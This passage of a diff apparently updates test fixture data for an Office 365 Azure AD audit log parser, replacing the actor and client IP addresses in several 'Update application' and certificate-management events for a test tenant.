datedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826392\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc\",\"ModifiedProperties\":[],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -18518,9 +18518,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { @@ -18712,7 +18712,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -18742,9 +18742,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { @@ -18947,7 +18947,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"KeyDescription\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.0442303Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826385\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"20a82fa1-625b-491a-a3e8-54d779a9b17e\",\"ModifiedProperties\":[{\"Name\":\"KeyDescription\",\"NewValue\":\"[\\r\\n \\\"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"KeyDescription\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application – Certificates and secrets management \",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -18977,9 +18977,9 